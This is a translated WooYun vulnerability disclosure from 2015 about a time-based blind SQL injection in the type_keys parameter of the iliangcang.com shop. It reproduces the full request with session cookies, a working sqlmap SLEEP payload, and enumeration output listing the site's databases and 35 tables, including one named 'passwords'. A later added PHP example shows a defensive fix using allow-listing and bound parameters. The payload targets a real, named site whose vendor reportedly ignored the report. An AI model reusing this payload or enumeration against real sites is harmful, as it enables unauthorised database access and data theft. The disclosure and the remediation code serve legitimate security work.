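Vulnerability summary

Bug ID: wooyun-2015-0142381

Title: SQL injection vulnerability on the official Liangcang (良仓) website

Vendor: www.iliangcang.com

Author: xunnun

Submitted: 2015-09-21 23:09

Fix time: 2015-09-26 23:10

Public disclosure: 2015-09-26 23:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: The vendor has been notified of the vulnerability but has ignored it

Source: http://www.wooyun.org; for questions or help, contact [email protected]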


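Vulnerability details

Disclosure status:

2015-09-21: Details sent to the vendor; waiting for the vendor to respond
2015-09-26: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

rt

Detailed description: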

GET /i/goods/?act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1,1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.iliangcang.com:80/
Cookie: PHPSESSID=ng7n8q9f3cjhu90sgc9f2fhm34; CNZZDATA1255589131=1820958677-1442496092-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1442496092; Hm_lvt_e1ff3456921b2853f7a913e1b4d776c0=1442501718,1442501963,1442502082,1442502323; Hm_lpvt_e1ff3456921b2853f7a913e1b4d776c0=1442502323; HMACCOUNT=2BF61C215E56F16E; looyu_id=674639192215e9e691bb2fb801024e6986_53645%3A1; looyu_53645=v%3A674639192215e9e691bb2fb801024e6986%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m188.looyu.com/monitor; _jzqco=%7C%7C%7C%7C%7C1.1235655964.1442499463200.1442501593179.1442502323250.1442501593179.1442502323250.0.0.0.7.7; __utmt=1; __utma=248775135.1341662073.1442499463.1442499463.1442499463.1; __utmb=248775135.6.10.1442499463; __utmc=248775135; __utmz=248775135.1442499463.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); MECHAT_LVTime=1442502323318; MECHAT_CKID=cookieVal=006600144249962600255771; MECHAT-OLDFRIEND=true
Host: www.iliangcang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


The type_keys parameter is injectable

sqlmap identified the following injection point(s) with a total of 152 HTTP(s) requests:
---
Parameter: type_keys (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ
---
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0.12
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: type_keys (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: act=checkGoodsAmount&attr_keys=0,17&goods_id=248049&type_keys=1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ
---
web application technology: PHP 5.5.23
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] jliangcang
[*] test



Proof of vulnerability:

back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] jliangcang
[*] test
Database: jliangcang
[35 tables]
+-----------------------+
| CPG_filetypes |
| ClassificationNode |
| DEPT |
| EPIXEIRISI |
| Economy |
| ORDERS |
| ORDERSTATUS |
| SALES |
| Parameter |
| session |
| bombing |
| business |
| companies |
| cv_pests_diseases |
| dtb_send_history |
| e107_user |
| experimental_data_set |
| ezin_users |
| help_topic |
| identification |
| item_master_seq |
| medicalprocedure |
| mushroom_test_results |
| object |
| passwords |
| pricegroup |
| principal |
| queries |
| records |
| region |
| tag |
| tbl_event |
| tf_settings |
| userlist |
| vendor_types |
+-----------------------+

Fix:

Copyright notice: when reposting, please credit the source xunnun@WooYun
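
An added example (not code from the report or from the vendor) of how a handler for the request above could refuse the type_keys payload: allow-list the comma-separated integer parameters, then pass them as bound statement parameters. The function, table and column names are hypothetical, the string comparison on type_keys is an assumption drawn from the quoted context of the payload, and in-memory SQLite stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example: checkGoodsAmount(), goods_stock and its columns are hypothetical.

/** Accept only "1,1"-style lists of short decimal integers. */
function parseIntList($raw, int $maxItems = 16): array
{
    if (!is_string($raw) || !preg_match('/\A\d{1,9}(?:,\d{1,9})*\z/', $raw)) {
        throw new InvalidArgumentException('malformed integer list');
    }
    $items = array_map('intval', explode(',', $raw));
    if (count($items) > $maxItems) {
        throw new InvalidArgumentException('too many list items');
    }
    return $items;
}

function checkGoodsAmount(PDO $pdo, array $query): int
{
    $goodsId = filter_var($query['goods_id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($goodsId === false) {
        throw new InvalidArgumentException('malformed goods_id');
    }
    // Re-serialise from the parsed integers so only canonical text reaches SQL.
    $typeKeys = implode(',', parseIntList($query['type_keys'] ?? null));
    $attrKeys = implode(',', parseIntList($query['attr_keys'] ?? null));
    // Values travel as bound parameters, never as part of the SQL text.
    $stmt = $pdo->prepare('SELECT amount FROM goods_stock
                           WHERE goods_id = ? AND type_keys = ? AND attr_keys = ?');
    $stmt->execute([$goodsId, $typeKeys, $attrKeys]);
    $amount = $stmt->fetchColumn();
    return $amount === false ? 0 : (int) $amount;
}

// Constructed sample data; the second request carries the payload quoted in the report.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE goods_stock (goods_id INTEGER, type_keys TEXT, attr_keys TEXT, amount INTEGER)');
$pdo->exec("INSERT INTO goods_stock VALUES (248049, '1,1', '0,17', 3)");
$good = ['goods_id' => '248049', 'type_keys' => '1,1', 'attr_keys' => '0,17'];
$bad  = ['type_keys' => "1' AND (SELECT * FROM (SELECT(SLEEP(5)))kiBU) AND 'RoMJ'='RoMJ"] + $good;

echo 'valid request -> amount ', checkGoodsAmount($pdo, $good), "\n";
try {
    checkGoodsAmount($pdo, $bad);
} catch (InvalidArgumentException $e) {
    echo 'payload from the report -> rejected: ', $e->getMessage(), "\n";
}
```

With the MySQL PDO driver, setting PDO::ATTR_EMULATE_PREPARES to false makes the server perform the parameter binding instead of the client library.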


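Vulnerability response

Vendor response:

Severity: No impact, ignored by vendor

Ignored at: 2015-09-26 23:10

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None yet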